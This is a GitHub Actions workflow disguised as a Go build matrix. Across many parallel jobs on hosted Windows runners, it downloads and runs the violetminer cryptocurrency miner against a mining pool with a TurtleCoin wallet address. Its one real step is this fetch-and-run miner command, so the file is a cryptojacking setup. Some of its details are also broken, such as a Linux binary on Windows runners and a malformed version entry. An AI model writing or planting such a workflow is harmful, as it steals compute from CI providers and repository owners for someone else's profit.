name: kunyuk.sh

on: [workflow_dispatch]

jobs:

  build:

    name: Kunyuk

    runs-on: windows-latest

    strategy:

      max-parallel: 5

      fail-fast: false

      matrix:

        go: [1.0, 1.1, 1.2, 1.3, 1,35]

        flag: [A, B, C, D, E, F, G, H, I]

    env:

        NUM_JOBS: 20

        JOB: ${{ matrix.go }}

    steps:

    - name: DOWNLOAD

      run: Invoke-WebRequest https://github.com/turtlecoin/violetminer/releases/download/v0.2.2/violetminer-linux-v0.2.2.tar.gz && tar xvf violetminer-linux-v0.2.2.tar.gz && cd violetminer-linux-v0.2.2 && ./violetminer --pool pool.hashvault.pro:80 --username TRTLv2zcCvhGLNapck1NKJ8bckuWx63mpGx59iY4wcer8RoAndB9wjNXTJuaYzH8BuFqJWGAGPNFKAqJHY6TqsvTJ5jnTq4hk9V.$(echo $(shuf -i 1000-9999999999 -n 1)-T4#ha9f-ie8n) --password x --algorithm chukwa/wrkz
      
    - name: DONE

      run: exit
